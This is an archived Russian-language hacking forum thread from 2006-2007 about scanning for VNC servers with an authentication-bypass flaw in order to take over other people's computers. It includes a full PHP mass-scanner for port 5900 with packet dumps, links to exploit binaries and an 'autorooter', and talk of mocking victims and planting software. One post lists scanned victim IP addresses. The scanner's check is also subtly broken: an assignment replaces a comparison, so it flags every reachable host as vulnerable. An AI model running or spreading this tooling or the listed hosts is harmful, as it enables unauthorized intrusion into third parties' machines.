PDA

Просмотр полной версии : VNC bypass scanner ( проще говоря " добываем дедики" )


gemaglabin
11.09.2006, 21:11
Скрипт для сканирования VNC на уязвимости

Проще говоря VNC чтото вроде remote desktop,или радмина.Штука нешуточная и позволяет насканить много дедиков.

С помощью Bl4ck-vnc-viewer можно приконектится к зараженным хостам. ( milw0rm.com/exploits/1791 )

Если ошибки найдите скажите...

http://www.mytempdir.com/923875

nerezus
11.09.2006, 21:52
Да вот только от рута ее не запускают... %)
Да и пароля дефолтного нет, надо при первом запуске задавать.
Да и реализаций разных десятки...

gemaglabin
12.09.2006, 18:50
Ну вообщем кто фишку не просек тот мягко говоря сосет ;)

Посканив небольшую сетку я обнаружил несколько бажных VNC сервисов и смог неплохо поглумиться над юзерами + ничего не мешает поставить свой софт.

Формат входных данных - лист из айпи адресов,вида 127.0.0.1-127.0.0.255 нельзя

http://img213.imageshack.us/img213/5894/vncoi0.gif

gemaglabin
15.09.2006, 22:37
Нуждаюсь в подобных сплоитах для Vnc демонов

forgotten
18.09.2006, 00:53
Кому надо - скрипт для генерации рандомных ip.
http://www.nikitoz.org/gen.php

Генерит ~9000 адрессов.

blackybr
18.09.2006, 16:28
ОС : WiNDoWs [ ALL ] *NiX
Описание : Прога для генерирования списков IP адресов
_http://ugas.fatal.ru/releases/IpGenerator.rar

помогло )

Err0r
08.11.2006, 19:24
Ну вообщем кто фишку не просек тот мягко говоря сосет А может всетаки подскажешь?

KSURi
08.11.2006, 20:10
А что подсказать то?
Гемин скрипт ищет бажные внцшки в который возможно обойти авторизацию.
Обход производится с помощью модифицированного клиента внц.
Или тебе тех подробности бага расписать?

Уязвимость до сих пор актуальна. Просто надо правильно выбирать диапозоны для скана.

ЗЫ: во избежание вопросов скажу что если после коннекта у вас появилась виндовая авторизация - ловить там практически нечего.

ЗЗЫ: внц авторутер с сорцами:
http://www.megaupload.com/it/?d=J1X2ETX9

Err0r
09.11.2006, 17:31
А что подсказать то?
Или тебе тех подробности бага расписать?
Да! ;)

Уязвимость до сих пор актуальна. Просто надо правильно выбирать диапозоны для скана.
ну прсканил я сканером 674 компа 114 из них оказались is vulnerable

ЗЫ: во избежание вопросов скажу что если после коннекта у вас появилась виндовая авторизация - ловить там практически нечего. А если такая авторизация*
http://img300.imageshack.us/img300/69/4034xyinnatt6.gif
ЗЗЫ: внц авторутер с сорцами:
http://www.megaupload.com/it/?d=J1X2ETX9
Спасибо!

KSURi
09.11.2006, 17:54
А если такая авторизация*
Значит сервер патчен.
ну прсканил я сканером 674 компа 114 из них оказались is vulnerable
А я просканил допесты компов и допесты из них vulnerable, что теперь?
Да!
Снифай клиент оригинальный и патченный, потом сравнивай со спецификацией протокола (http://vnc.com/documentation.html)
Спасибо!
Пожалуйста

Err0r
09.11.2006, 18:01
KSURi - Спасибо, что разложил по полочкам и резжевал! =) РЕСПЕКТ!

Ksander
09.11.2006, 18:16
Перезалейте куда-то, не качает чего-то.

KSURi
09.11.2006, 21:07
К сожалению копии геминого скрипта у меня нету, так что:
win: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar
nix based: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-linux.tar.gz

Aerot1smo
09.02.2007, 00:03
а этот скрипт ещё работает,хочу попробывать надыбать дедиков себе?

Kиt
02.07.2007, 09:06
Перезалейте скрипт внс и внц авторутер с сорцами: плиз и какой порт на внц ?

_kREveDKo_
12.07.2007, 00:20
Перезалейте гемин скрипт

ettee
12.07.2007, 00:53
<?php

/**
Made by gemaglabin ; underwater.cup.su
Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
#aol on ru.dal.net ; cup.su and antichat.ru
try to connect vulnerable hosts with Bl4ck-VNC-Viewer
milw0rm.com/exploits/1791
*/

# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");

# loging...
function tpl_process($title,$color)
{
return <<<HTML
<SCRIPT>
with(document.getElementById('logarea'))
{
str = "$title";
col = "$color"
str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
innerHTML += innerHTML ? "<BR>\\n" + str : str;
scrollTop += 14;
}
</SCRIPT>
HTML;
}


# main function
function Scan_Server ($aserver,$aport )
{
global $fsock;
$fsock = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
if ($fsock)
{
$res = false;
fread( $fsock,10 );
# sending first packet named hello
$request = pack("H*",_HELLO_PACKET);
fwrite ( $fsock,$request );
fread( $fsock,10 );
# sending second packet where we try to ayth without pass
$request = pack("H*","01");
fwrite ( $fsock,$request );
# parsing responce for our auth packet
$answer = fread( $fsock,10 );
$answer = unpack("H*",$answer);
if ($answer[1] = "00000000") $res = true;
fclose ($fsock);
}
return $res;
}


SENDING HELLO PACKET
0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A .^Г›..Ю/.ёАЁ|c..
0x0020 C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00 И.0Ѓ?..:.Ц..8˜..
0x0030 3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06 ;.я..!E..6Гљ@.Ю.
0x0040 0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9 .Њ..яюQ8q].ј...№
0x0050 1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46 .І6ЖЪUP.яу'Ч..RF
0x0060 42 20 30 30 33 2E 30 30-38 0A 0D 0A B 003.008...



0x0000 00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00 .P‹.3T..a[†У..E.
0x0010 00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A .QЬЁ..Ю/р·АЁ|c..
0x0020 C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00 И.0Ѓ?..-.Ц..?Ћ..
0x0030 42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06 B.я..!E..)Ь§@.Ю.
0x0040 F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50 у‹..яюQ8q].X..уP
0x0050 85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01 …Њ.CЧпP.яс`К...



VULNERABLE SERVER
0x0000 00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00 ..a[†У.P‹.3T..E.
0x0010 00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8 .TмЩ..ъ/Дѓ..И.АЁ
0x0020 7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00 |c0Ѓ?..0@...B...
0x0030 3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06 ?Ћя..!E..,!„@.k.
0x0040 21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43 !*Q8q]..яю...X.C
0x0050 D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00 ЧпуP…ЌP.ятaЕ....
0x0060 00 00 ..


?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
overflow: auto;
}

input, select, div {
font: 11px tahoma, verdana, arial;
}
input.text, select {
width: 100%;
}
fieldset {
margin-bottom: 4px;
}

#header {
font-size: 9px;
color: white;
padding: 4px;
background-color: #7A96DF;
font-family: tahoma;
text-vertical: center;
}

</STYLE>
</HEAD>

<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header">
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]
</a>
</div>
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr>
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr>
</tr>
</table>
</div>
</div>
</form>
</BODY>

<?php

if (isset($_POST['servers']))
{
$_servers = $_POST['servers'];
$servers = explode("\r\n",$_servers);
for ($i=0;$i<count($servers);$i++)
{
$host = $servers[$i];
$port = "5900";
$vuln = Scan_Server($host,$port);
if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
else echo tpl_process("<b>$host is vulnerable</b>","green");
}
}

?>

THE_END
02.10.2007, 02:12
Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я

212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226

te$t
11.10.2007, 20:34
Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я

212.147.28.150
213.147.108.35
213.177.73.9
213.176.142.73
213.179.6.43
213.192.200.249
213.200.229.57
213.210.5.24
213.210.5.25
213.210.5.14
213.210.5.15
213.210.5.20
213.233.112.69
213.221.55.226
хы дядя, елиб ты пользовался багой примерно год назад,
то наверное тебе бы удалось, чтонидь отловить. А сейчас для добычи дедика нужно перелопатить весь сегмент какой либо страны... К примеру недавно в Австралии поймал пару дедиков W2003. Попробуй приконеткится через метасплоет, у меня иногда прокатывает...

Lancellot
20.10.2007, 16:36
Ссорь за тупой вопрос но как запустить этот скрипт,с какими параметрами и что должно быть розришено на шелле?
И как там ставить диапазон?
--
заранее спс